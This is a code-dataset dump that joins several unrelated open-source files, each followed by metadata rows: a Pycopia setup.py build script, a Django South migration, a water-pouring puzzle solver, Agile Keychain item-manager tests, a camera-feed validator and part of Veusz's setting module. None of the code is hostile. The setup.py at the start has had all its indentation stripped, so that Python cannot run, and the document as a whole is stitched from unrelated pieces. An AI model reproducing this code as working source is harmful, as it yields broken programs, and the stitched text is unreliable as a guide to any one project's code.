# -*- coding: utf-8 -*-
# vim:ts=4:sw=4:softtabstop=4:smarttab:expandtab
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
DOC = """
Master builder (custom script).
This top-level setup script helps with dealing with all sub-packages at
once. It also provides an installer to simplify setting up developer mode.
Invoke it like a standard setup.py script. However, any names after the
operation name are taken as sub-package names that are operated on. If no
names are given then all packages are operated on.
Commands:
list -- List available subpackages. These are the names you may
optionally supply.
publish -- Put source distribution on pypi.
build -- Run setuptools build phase on named sub-packages
(or all of them).
install -- Run setuptools install phase.
install_scripts -- Only install scripts (files in bin) with a direct copy.
eggs -- Build distributable egg package.
rpms -- Build RPMs on platforms that support building RPMs.
msis -- Build Microsoft .msi on Windows.
wininst -- Build .exe installer on Windows.
develop -- Developer mode, as defined by setuptools.
develophome -- Developer mode, installing .pth and script files in
user directory.
clean -- Run setuptools clean phase.
squash -- Squash (flatten) all named sub-packages into single tree
in $PYCOPIA_SQUASH, or user site-directory if no
$PYCOPIA_SQUASH defined. This also removes the setuptools
runtime dependency.
Most regular setuptools commands also work. They are passed through by
default.
NOTE: The install operation requires that the sudo command be configured for
you.
"""
import sys
import os
import site
try:
import setuptools
except ImportError:
print("Pycopia requires the package named 'setuptools' to be installed.", file=sys.stderr)
try:
WEXITSTATUS = os.WEXITSTATUS
except AttributeError: # running on Windows
def WEXITSTATUS(arg):
return arg
os.environ["HOME"] = os.environ["USERPROFILE"]
RSYNCCHECK = "rsync --version >nul"
SCRIPT_DIR = os.path.join(sys.prefix, "Scripts")
else:
RSYNCCHECK = "rsync --version >/dev/null"
SCRIPT_DIR = "/usr/local/bin"
# sub-packages are listed in dependency order. A subpackage may import modules
# from other subpackages that appear earlier in this list, but not later.
PACKAGES = [
"aid",
"utils",
"core",
"CLI",
"debugger",
"process",
"net",
"SMI",
"mibs",
"SNMP",
"storage",
"audio",
"XML",
"WWW",
"QA",
"vim",
"doc",
"fepy",
]
# Where to put "squashed", or flattened target where all subpackages are
# installed into one directory, and removing "package namespace" support.
PYCOPIA_SQUASH = os.environ.get("PYCOPIA_SQUASH", site.USER_SITE)
# Where top-level scripts will be installed to when install_scripts command is used.
PYCOPIA_BIN = os.environ.get("PYCOPIA_BIN", os.path.join(os.path.expandvars("$HOME"), "bin"))
def _do_commands(name, cmds, root):
# use sudo on Linux and possibly other platforms. On Windows it's
# assumed you're running as Administrator (everybody does it...)
if root and sys.platform not in ("win32", "cli"):
sudo = "sudo "
else:
sudo = ""
cmd = "%s%s setup.py %s" % (sudo, sys.executable, " ".join(cmds))
print("========", name, "==", cmd)
rv = False
os.chdir(name)
try:
rv = WEXITSTATUS(os.system(cmd)) == 0
finally:
os.chdir("..")
print("====================== END", name, "\n")
return rv
def do_eggs(name):
return _do_commands(name, ["bdist_egg"], False)
def do_rpms(name):
return _do_commands(name, ["bdist_rpm", "--python", sys.executable], False)
def do_msis(name):
return _do_commands(name, ["bdist_msi"], False)
def do_wininst(name):
return _do_commands(name, ["bdist_wininst"], False)
# "scripts", those files in bin/, may require some special interpreter
# flags, such as -S. This prevents setuptools from functioning.
# Since Pycopia scripts are written generically there is no reason not to
# install them as-is.
# only works on Linux for now.
def _do_scripts(name, scriptdir, root=False):
if root and sys.platform not in ("win32", "cli"):
sudo = "sudo "
else:
sudo = ""
os.chdir(name)
rv = True
try:
if os.path.isdir("bin"):
if sys.platform == "darwin":
cmd = "%scp -a bin/* %s" % (sudo, scriptdir)
else:
cmd = "%scp -dR --preserve=mode bin/* %s" % (sudo, scriptdir)
print("======== SCRIPTS", name, "==", cmd)
rv = WEXITSTATUS(os.system(cmd)) == 0
finally:
os.chdir("..")
print("====================== END SCRIPTS", name)
return rv
def do_install_scripts(name):
return _do_scripts(name, PYCOPIA_BIN)
def do_develophome(name):
if not os.path.isdir(site.USER_SITE):
os.makedirs(site.USER_SITE)
rv = _do_commands(name, ["develop", "--install-dir", site.USER_SITE, "--script-dir", PYCOPIA_BIN, "-l -N"], False)
rvs = _do_scripts(name, PYCOPIA_BIN)
return rv and rvs
def do_develop(name):
rv = _do_commands(name, ["develop", "--script-dir", PYCOPIA_BIN, "-l -N"], False)
rvs = _do_scripts(name, PYCOPIA_BIN)
return rv and rvs
def do_publish(name):
return _do_commands(name, ['egg_info -RDb ""', "sdist", "register", "upload"], False)
def do_egg_info(name):
return _do_commands(name, ['egg_info'], False)
def do_install(name):
rv1 = _do_commands(name, ["install -O2", "--install-scripts", SCRIPT_DIR], True)
# Don't use the setuptools script wrapper for Pycopia scripts. This
# will overwrite the installed scripts with a direct copy.
rv2 = _do_scripts(name, SCRIPT_DIR, True)
return rv1 and rv2
def do_clean(name):
return _do_commands(name, ["clean"], False)
def do_list(name):
print(name, end=" ")
return True
# "squash" selected sub packages to a single package. Also removes
# setuptools dependency when tarballed.
def do_squash(name):
if not _check_rsync():
print("Squash requires rsync tool to be installed.")
return False
if not os.path.isdir(PYCOPIA_SQUASH):
os.makedirs(PYCOPIA_SQUASH)
os.chdir(name)
uname = os.uname()
bin_dir = os.path.join("build", "lib.%s-%s-%s" % (uname[0].lower(), uname[4], sys.version[:3]))
# e.g: build/lib.linux-x86_64-2.5/pycopia
print("======== SQUASH", name, "to", PYCOPIA_SQUASH)
try:
if WEXITSTATUS(os.system("%s setup.py build" % (sys.executable,))) != 0:
return False
for pydir in ("build/lib", bin_dir):
if os.path.isdir(pydir):
cmd = "rsync -azvu %s/ %s" % (pydir, PYCOPIA_SQUASH)
if WEXITSTATUS(os.system(cmd)) != 0:
return False
finally:
os.chdir("..")
_null_init(PYCOPIA_SQUASH)
print("====================== END", name, "squashed into", PYCOPIA_SQUASH, "\n")
return True
def _null_init(directory):
open(os.path.join(directory, "pycopia", "__init__.py"), "w").close()
def _check_rsync():
return WEXITSTATUS(os.system(RSYNCCHECK)) == 0
def do_generic(name):
pass
def get_svn_revision():
import subprocess
from xml.etree import ElementTree
info = ElementTree.fromstring(subprocess.check_output("svn info --xml".split()))
rev = info.find("entry").attrib["revision"]
return int(rev)
def main(argv):
try:
cmd = argv[1]
except IndexError:
print(DOC)
return 1
# mainrev = get_svn_revision()
# os.environ["PYCOPIA_REVISION"] = str(mainrev)
try:
method = globals()["do_" + cmd]
except KeyError:
def method(name):
return _do_commands(name, [cmd], False)
for name in (argv[2:] or PACKAGES):
if not method(name):
break
print()
return 0
sys.exit(main(sys.argv))
|
apache-2.0
| -4,479,907,580,095,837,000
| 31.714829
| 118
| 0.630288
| false
| 3.483401
| false
| false
| false
|
sa2ajj/DistroTracker
|
pts/mail/migrations/0001_initial.py
|
1
|
7292
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'CommandConfirmation'
db.create_table(u'mail_commandconfirmation', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('confirmation_key', self.gf('django.db.models.fields.CharField')(unique=True, max_length=40)),
('date_created', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('commands', self.gf('django.db.models.fields.TextField')()),
))
db.send_create_signal(u'mail', ['CommandConfirmation'])
# Adding model 'BounceStats'
db.create_table(u'mail_bouncestats', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('email_user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['core.EmailUser'])),
('mails_sent', self.gf('django.db.models.fields.IntegerField')(default=0)),
('mails_bounced', self.gf('django.db.models.fields.IntegerField')(default=0)),
('date', self.gf('django.db.models.fields.DateField')()),
))
db.send_create_signal(u'mail', ['BounceStats'])
# Adding unique constraint on 'BounceStats', fields ['email_user', 'date']
db.create_unique(u'mail_bouncestats', ['email_user_id', 'date'])
def backwards(self, orm):
# Removing unique constraint on 'BounceStats', fields ['email_user', 'date']
db.delete_unique(u'mail_bouncestats', ['email_user_id', 'date'])
# Deleting model 'CommandConfirmation'
db.delete_table(u'mail_commandconfirmation')
# Deleting model 'BounceStats'
db.delete_table(u'mail_bouncestats')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'core.emailuser': {
'Meta': {'object_name': 'EmailUser'},
'default_keywords': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['core.Keyword']", 'symmetrical': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user_email': ('django.db.models.fields.related.OneToOneField', [], {'to': u"orm['django_email_accounts.UserEmail']", 'unique': 'True'})
},
u'core.keyword': {
'Meta': {'object_name': 'Keyword'},
'default': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '50'})
},
u'django_email_accounts.user': {
'Meta': {'object_name': 'User'},
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'main_email': ('django.db.models.fields.EmailField', [], {'unique': 'True', 'max_length': '255'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'django_email_accounts.useremail': {
'Meta': {'object_name': 'UserEmail'},
'email': ('django.db.models.fields.EmailField', [], {'unique': 'True', 'max_length': '244'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "u'emails'", 'null': 'True', 'to': u"orm['django_email_accounts.User']"})
},
u'mail.bouncestats': {
'Meta': {'ordering': "[u'-date']", 'unique_together': "((u'email_user', u'date'),)", 'object_name': 'BounceStats'},
'date': ('django.db.models.fields.DateField', [], {}),
'email_user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.EmailUser']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mails_bounced': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'mails_sent': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
u'mail.commandconfirmation': {
'Meta': {'object_name': 'CommandConfirmation'},
'commands': ('django.db.models.fields.TextField', [], {}),
'confirmation_key': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '40'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
}
}
complete_apps = ['mail']
|
gpl-2.0
| 8,308,571,386,329,360,000
| 62.417391
| 187
| 0.566786
| false
| 3.642358
| false
| false
| false
|
jamescooke/water-pouring-python
|
water/game.py
|
1
|
7431
|
import copy
from functools import reduce
from .cup import Cup
or_reduction = lambda x, y: x or y
and_reduction = lambda x, y: x and y
class Game(object):
cups = None
parent = None # Game that created this one
children = None
def __init__(self, sizes=None, parent=None):
"""
Set up a game with cups.
Improvements
* Just pass Cups instead of int configs for Cups
* Put default cup config somewhere other than init
>>> g = Game()
>>> len(g.cups)
3
>>> g.parent is None
True
>>> g.children
[]
>>> h = Game(sizes=[(5, 5), (5, 0)], parent=g)
>>> len(h.cups)
2
>>> h.parent is g
True
"""
self.cups = []
if sizes is None:
# Set up cups with default sizes
sizes = [(3, 0), (5, 0), (8, 8)]
for cap, cont in sizes:
self.cups.append(Cup(cap=cap, cont=cont))
# Save a pointer to the parent
self.parent = parent
# Children starts empty
self.children = []
def is_goal(self):
"""
There is a Cup in the Game that has the goal conditions.
>>> g = Game(sizes=[(4, 4)])
>>> g.is_goal()
True
>>> h = Game()
>>> h.is_goal()
False
"""
return reduce(
or_reduction,
[cup.is_goal() for cup in self.cups]
)
def __eq__(self, g):
"""
Games have same number of Cups and all Cups are equal.
:pre: Game has at least one cup.
>>> g = Game(sizes=[(3, 0), (5, 5)])
1. Less or more games, even if equal, is not equal.
>>> g == Game(sizes=[(3, 0)])
False
>>> g == Game(sizes=[(3, 0), (5, 5), (1, 1)])
False
2. Same num of cups means checking cups.
>>> g == Game(sizes=[(3, 1), (5, 4)])
False
3. Equal is equal.
>>> g == Game(sizes=[(3, 0), (5, 5)])
True
"""
return (
len(self.cups) == len(g.cups)
and reduce(
and_reduction,
[cup == g.cups[pos] for pos, cup in enumerate(self.cups)]
)
)
def net_has_game(self, g):
"""
Game's network of games contains this game.
"""
return self.top_parent().has_game(g)
def top_parent(self):
"""
Returns the top parent for a game, the parent state that has no parent.
"""
return self if self.parent is None else self.parent.top_parent()
def has_game(self, g):
"""
Passed Game ``g`` is in this Game's tree of Games
>>> from unittest.mock import Mock
>>> g = Game(sizes=[(3, 0), (5, 5)])
1. If the game being seached for matches, then True
>>> g.has_game(Game(sizes=[(3, 0), (5, 5)]))
True
2. If game does not match and no child games, False
>>> g.has_game(Game(sizes=[(4, 0), (5, 5)]))
False
3. If game being search for does not match, sub games are searched
>>> s_a = Mock(name='sub Game A')
>>> s_a.has_game.return_value = False
>>> s_b = Mock(name='sub Game B')
>>> s_b.has_game.return_value = True
>>> g.children.append(s_a)
>>> g.children.append(s_b)
>>> g.has_game(Game(sizes=[(4, 0), (5, 5)]))
True
"""
return (
self == g
or (
len(self.children) > 0
and reduce(
or_reduction,
[game.has_game(g) for game in self.children]
)
)
)
def make_game(self, c_a, c_b):
"""
Create a new game state by pouring Cup at ``c_a`` into Cup at ``c_b``.
New game will have its parent set as this Game.
1. Does not care if the pour is a 'good pour', just returns the new
game. If there are no contents to pour, or no space in the
destination, then the new game will be in the same state and will
be removed by the de-duplication search.
>>> g = Game(sizes=[(3, 0), (5, 5)])
>>> h = g.make_game(0, 1)
>>> g == h
True
>>> h.parent is g
True
2. When the pour is good, then the cups' states are adjusted
accordingly. Original parent Game's cups stay the same.
>>> g = Game(sizes=[(3, 3), (5, 5), (8, 0)])
>>> h = g.make_game(0, 2)
>>> expected = Game(sizes=[(3, 0), (5, 5), (8, 3)])
>>> h == expected
True
>>> h.parent is g
True
>>> g.cups[0].contents
3
"""
new_game = copy.deepcopy(self)
new_game.parent = self
(new_game.cups[c_a],
new_game.cups[c_b]) = new_game.cups[c_a].pour_into(new_game.cups[c_b])
return new_game
def make_children(self):
"""
Do all the pours, check that new Games don't exist in the network and
for those that are new add them to this Game's children.
1. If there's just one cup, does nothing
>>> g = Game(sizes=[(4, 4)])
>>> g.make_children()
0
>>> g.children
[]
2. If a pour option creates a Game that's already in the network then
it's not added to the children.
>>> g = Game(sizes=[(3, 0), (5, 5)])
>>> g.make_children()
1
>>> expected = Game(sizes=[(3, 3), (5, 2)])
>>> g.children[0] == expected
True
3. If the Game generated by pouring is already in the network, then no
new games are generated. In this example, the only option from Game
g is to pour the 5 cup into the 3 cup, but this is the same state
as the parent h, so is ignored.
>>> h = Game(sizes=[(3, 3), (5, 2)])
>>> g = Game(sizes=[(3, 0), (5, 5)])
>>> h.children = [g]
>>> g.parent = h
>>> g.make_children()
0
"""
for c_a in range(len(self.cups)):
for c_b in range(len(self.cups)):
if c_b == c_a:
continue
new_game = self.make_game(c_a, c_b)
if not self.net_has_game(new_game):
self.children.append(new_game)
return len(self.children)
def is_solvable(self):
"""
Main function. Could be written as a one line boolean, but keeping it
like this for readability. See unittests for coverage.
"""
if self.is_goal():
self.print_trace()
return True
if self.make_children() == 0:
return False
return self.solvable_child()
def solvable_child(self):
"""
Recursively walks list of Game's children looking for a solvable one.
Wishing python was haskell ._. See unittests for coverage.
"""
for child in self.children:
if child.is_solvable():
return True
return False
def print_trace(self):
"""
Run up the stack of Games printing each one so that a history can be
outputted when success is found. See unittests for coverage.
"""
if self.parent is not None:
self.parent.print_trace()
print(self.cups)
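if __name__ == "__main__":
    # Illustrative usage sketch (not part of the original module): the default
    # Game is the classic 3/5/8 pouring puzzle; is_solvable() prints a trace of
    # cup states once a goal state (as defined by Cup.is_goal) is reached.
    # Because of the relative import above, run it as a module, e.g.
    # `python -m water.game`.
    print(Game().is_solvable())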
|
gpl-2.0
| -2,943,814,514,436,023,000
| 28.027344
| 79
| 0.491724
| false
| 3.730422
| false
| false
| false
|
openpassword/blimey
|
tests/integration/openpassword/agile_keychain/test_item_manager.py
|
1
|
4311
|
import os
import shutil
import time
import json
from nose.tools import raises
from blimey.agile_keychain._manager._item_manager import ItemManager
from blimey.agile_keychain.data_source import AgileKeychainItem
from blimey.exceptions import ItemNotFoundException
class ItemManagerTest:
_fixture_path = os.path.join('tests', 'fixtures', 'test.agilekeychain')
_temporary_path = os.path.join('tests', 'fixtures', 'temp.agilekeychain')
_password = "somepassword"
def it_gets_items(self):
item_manager = ItemManager(self._fixture_path)
item = item_manager.get_by_id('5F7210FD2F3F460692B7083C60854A02')
assert item['uuid'] == "5F7210FD2F3F460692B7083C60854A02"
@raises(ItemNotFoundException)
def it_throws_if_requested_item_is_not_found(self):
item_manager = ItemManager(self._fixture_path)
item_manager.get_by_id('notfoundid')
# 1Password 3 changes deleted item type to system.Tombstone
# Refer to the item in the fixture for an example of this
@raises(ItemNotFoundException)
def it_throws_if_requested_item_is_of_type_tombstone(self):
item_manager = ItemManager(self._fixture_path)
item_manager.get_by_id('320BE3D1B490458F82314E1A2B99552A')
# 1Password 4+ replaces the item contents with "{}"
# Refer to the item in the fixture for an example of this
@raises(ItemNotFoundException)
def it_throws_if_requested_item_is_empty(self):
item_manager = ItemManager(self._fixture_path)
item_manager.get_by_id('CAF7A781A71E44CFBB63F9356B46A0C9')
def it_gets_all_non_null_and_non_tombstoned_items(self):
item_manager = ItemManager(self._fixture_path)
items = item_manager.get_all_items()
expected_item_uuids = [
'2E21D652E0754BD59F6B94B0323D0142',
'4A3D784D115F4279BDFCE46D0A162D57',
'5F7210FD2F3F460692B7083C60854A02',
'6371E49FEFA042EDB335421459E5B29F',
'9315F5EA8DCC4CB7BE09155DB7FCD1ED',
'97019BEBCF9E402F8F0C033474B1B85D',
'9E7673CCBB5B4AC9A7A8838835CB7E83',
'B851D6E3232842B0858BC10968632A9C',
'D05009E62D7D401CB8ACF2FE6981C031',
'ECE79F0A4BDF44CE8E7986897D84D1EC'
]
assert len(items) == len(expected_item_uuids)
for item in items:
assert item['uuid'] in expected_item_uuids
def it_saves_items(self):
self._init_default_data_dir()
item_manager = ItemManager(self._temporary_path)
item = self._get_item()
item_manager.save_item(item)
retrieved_item = item_manager.get_by_id(item['uuid'])
assert item['uuid'] == retrieved_item['uuid']
def it_sets_update_time_on_save(self):
self._init_default_data_dir()
item_manager = ItemManager(self._temporary_path)
item = self._get_item()
item_manager.save_item(item)
retrieved_item = item_manager.get_by_id(item['uuid'])
assert item['updatedAt'] > 0
assert item['updatedAt'] <= time.time()
def it_updates_contents_file_when_items_are_saved(self):
self._init_default_data_dir()
item_manager = ItemManager(self._temporary_path)
item = self._get_item()
item_manager.save_item(item)
with open(os.path.join(self._temporary_path, 'data', 'default', 'contents.js')) as file:
contents = json.load(file)
assert contents[0][0] == item['uuid']
assert contents[0][1] == item['typeName']
assert contents[0][2] == item['title']
assert contents[0][3] == item['locationKey']
assert contents[0][4] == item['folderUuid']
assert contents[0][5] == 0 # No idea what this value is
assert contents[0][6] == 'Y' # Corresponds to 'trashed'
def _get_item(self):
return AgileKeychainItem({
'uuid': 'abcdef',
'typeName': 'typename',
'title': 'Title',
'locationKey': 'locationkey',
'folderUuid': 'undefined',
'trashed': True
})
def _init_default_data_dir(self):
os.makedirs(os.path.join(self._temporary_path, 'data', 'default'))
self.teardown = self._path_clean
def _path_clean(self):
shutil.rmtree(self._temporary_path)
|
mit
| -2,044,052,607,398,452,500
| 34.336066
| 96
| 0.644398
| false
| 3.221973
| false
| false
| false
|
LukeJFernandez/stitch-flex
|
app/util/validatefeeds.py
|
1
|
1341
|
""" Utility module for validating camera feeds. """
from __future__ import absolute_import, division, print_function
from .textformatter import TextFormatter
from .feed import CameraFeed
def view_valid_camera_feeds():
"""
Shows all valid feed views, one after another. The next feed shows when the current is closed.
"""
valid_feeds = []
TextFormatter.print_heading("Checking for valid feeds.")
try:
for index in xrange(1, 5):
if check_feed(index):
valid_feeds.append(index)
except NameError:
for index in range(1, 5):
if check_feed(index):
valid_feeds.append(index)
if len(valid_feeds) > 0:
TextFormatter.print_heading("Valid Feeds:")
for feed in valid_feeds:
show_camera_feed(feed)
else:
TextFormatter.print_info("No Valid Feeds")
def check_feed(feed_index):
"""
Checks if the provided index points to a valid camera feed.
"""
camera_feed = CameraFeed(feed_index)
return camera_feed.is_valid()
def show_camera_feed(feed_index):
"""
Shows the camera feed pointed to by the provided feed_index.
"""
camera_feed = CameraFeed(feed_index)
# Show the uncorrected feed.
camera_feed.show(False)
if __name__ == "__main__":
view_valid_camera_feeds()
|
mit
| 2,553,727,568,890,088,000
| 28.152174
| 98
| 0.634601
| false
| 3.853448
| false
| false
| false
|
arichar6/veusz
|
veusz/setting/setting.py
|
1
|
57973
|
# Copyright (C) 2005 Jeremy S. Sanders
# Email: Jeremy Sanders <jeremy@jeremysanders.net>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
"""Module for holding setting values.
e.g.
s = Int('foo', 5)
s.get()
s.set(42)
s.fromUIText('42')
"""
from __future__ import division
import re
import sys
import numpy as N
from ..compat import cbasestr, cstr, crepr
from .. import qtall as qt4
from . import controls
from .settingdb import settingdb, uilocale, ui_floattostring, ui_stringtofloat
from .reference import ReferenceBase, Reference
from .. import utils
from .. import datasets
class OnModified(qt4.QObject):
"""onmodified is emitted from an object contained in each setting."""
onModified = qt4.pyqtSignal()
class Setting(object):
"""A class to store a value with a particular type."""
# differentiate widgets, settings and setting
nodetype = 'setting'
typename = 'setting'
# various items in class hierarchy
iswidget = False
issetting = True
issettings = False
def __init__(self, name, value, descr='', usertext='',
formatting=False, hidden=False):
"""Initialise the values.
name: setting name
value: default value and initial value
descr: description of the setting
usertext: name of setting for user
formatting: whether setting applies to formatting
hidden: hide widget from user
"""
self.readonly = False
self.parent = None
self.name = name
self.descr = descr
self.usertext = usertext
self.formatting = formatting
self.hidden = hidden
self.default = value
self.onmodified = OnModified()
self._val = self._ref = None
# calls the set function for the val property
self.val = value
def _copyHelper(self, before, after, optional):
"""Help copy an object.
before are arguments before val
after are arguments after val
        optional are optional arguments
"""
val = self._ref if self._ref else self._val
args = (self.name,) + before + (val,) + after
opt = optional.copy()
opt['descr'] = self.descr
opt['usertext'] = self.usertext
opt['formatting'] = self.formatting
opt['hidden'] = self.hidden
obj = self.__class__(*args, **opt)
obj.readonly = self.readonly
obj.default = self.default
return obj
def copy(self):
"""Make a setting which has its values copied from this one.
This needs to be overridden if the constructor changes
"""
return self._copyHelper((), (), {})
def get(self):
"""Get the value."""
if self._ref:
return self._ref.resolve(self).get()
else:
return self._val
def set(self, v):
"""Set the value."""
if isinstance(v, ReferenceBase):
self._val = None
self._ref = v
else:
self._val = self.normalize(v)
self._ref = None
self.onmodified.onModified.emit()
val = property(
get, set, None,
'Get or modify the value of the setting')
def isReference(self):
"""Is this a setting a reference to another object."""
return bool(self._ref)
def getReference(self):
"""Return the reference object. Raise ValueError if not a reference"""
if self._ref:
return self._ref
else:
raise ValueError("Setting is not a reference")
def getStylesheetLink(self):
"""Get text that this setting should default to linked to the
stylesheet."""
path = []
obj = self
while not obj.parent.iswidget:
path.insert(0, obj.name)
obj = obj.parent
path = ['', 'StyleSheet', obj.parent.typename] + path
return '/'.join(path)
def linkToStylesheet(self):
"""Make this setting link to stylesheet setting, if possible."""
self.set( Reference(self.getStylesheetLink()) )
@property
def path(self):
"""Return full path of setting."""
path = []
obj = self
while obj is not None:
# logic easier to understand here
# do not add settings name for settings of widget
if not obj.iswidget and obj.parent.iswidget:
pass
else:
if obj.name == '/':
path.insert(0, '')
else:
path.insert(0, obj.name)
obj = obj.parent
return '/'.join(path)
def toUIText(self):
"""Convert the type to text to show in UI."""
return ""
def fromUIText(self, text):
"""Convert text from UI into type for setting.
Raises utils.InvalidType if cannot convert."""
return None
def saveText(self, saveall, rootname = ''):
"""Return text to restore the value of this setting."""
if (saveall or not self.isDefault()) and not self.readonly:
if self._ref:
return "SetToReference('%s%s', %s)\n" % (
rootname, self.name, crepr(self._ref.value))
else:
return "Set('%s%s', %s)\n" % (
rootname, self.name, crepr(self.val) )
else:
return ''
def setOnModified(self, fn):
"""Set the function to be called on modification (passing True)."""
self.onmodified.onModified.connect(fn)
if self._ref:
# tell references to notify us if they are modified
self._ref.setOnModified(self, fn)
def removeOnModified(self, fn):
"""Remove the function from the list of function to be called."""
self.onmodified.onModified.disconnect(fn)
def newDefault(self, value):
"""Update the default and the value."""
self.default = value
self.val = value
def isDefault(self):
"""Is the current value a default?
This also returns true if it is linked to the appropriate stylesheet
"""
if self._ref and isinstance(self.default, ReferenceBase):
return self._ref.value == self.default.value
else:
return self._val == self.default
def isDefaultLink(self):
"""Is this a link to the default stylesheet value."""
return self._ref and self._ref.value == self.getStylesheetLink()
def setSilent(self, val):
"""Set the setting, without propagating modified flags.
This shouldn't often be used as it defeats the automatic update mechanism.
Used for temporary modifications."""
self._ref = None
self._val = self.normalize(val)
def normalize(self, val):
"""Convert external value to normalized form for storing
Raises a utils.InvalidType if this is not possible."""
return val
def makeControl(self, *args):
"""Make a qt control for editing the setting.
The control emits settingValueChanged() when the setting has
changed value."""
return None
def getDocument(self):
"""Return document."""
p = self.parent
while p:
if p.iswidget:
return p.document
p = p.parent
return None
def getWidget(self):
"""Return associated widget."""
w = self.parent
while not w.iswidget:
w = w.parent
return w
def safeEvalHelper(self, text):
"""Evaluate an expression, catching naughtiness."""
try:
comp = self.getDocument().evaluate.compileCheckedExpression(
text)
if comp is None:
raise utils.InvalidType
return float( eval(comp, self.getDocument().evaluate.context) )
except:
raise utils.InvalidType
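# The sketch below is illustrative only and not part of Veusz: it exercises
# the get/set/saveText cycle shown in the module docstring using the Int
# setting defined further down this module.  The setting name 'foo' is
# arbitrary.
def _example_setting_roundtrip():
    s = Int('foo', 5, minval=0, maxval=10)
    s.set(7)
    assert s.get() == 7
    assert not s.isDefault()
    # saveText() returns the command text needed to restore the value,
    # here "Set('foo', 7)\n"
    return s.saveText(False)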
# forward setting to another setting
class SettingBackwardCompat(Setting):
"""Forward setting requests to another setting.
This is used for backward-compatibility.
"""
typename = 'backward-compat'
def __init__(self, name, newrelpath, val, translatefn=None,
**args):
"""Point this setting to another.
newrelpath is a path relative to this setting's parent
"""
self.translatefn = translatefn
args['hidden'] = True
Setting.__init__(self, name, val, **args)
self.relpath = newrelpath
def getForward(self):
"""Get setting this setting forwards to."""
doc = self.getDocument()
return doc.resolveSettingPath(self.parent, self.relpath)
def normalize(self, val):
if self.parent is not None:
return self.getForward().normalize(val)
def toUIText(self):
return self.getForward().toUIText()
def fromUIText(self, val):
return self.getForward().fromUIText(val)
def set(self, val):
if self.parent is not None and not isinstance(val, ReferenceBase):
if self.translatefn:
val = self.translatefn(val)
self.getForward().set(val)
def isDefault(self):
return self.getForward().isDefault()
def get(self):
return self.getForward().get()
def copy(self):
return self._copyHelper(
(self.relpath,), (), {'translatefn': self.translatefn})
def makeControl(self, *args):
return None
def saveText(self, saveall, rootname = ''):
return ''
def linkToStylesheet(self):
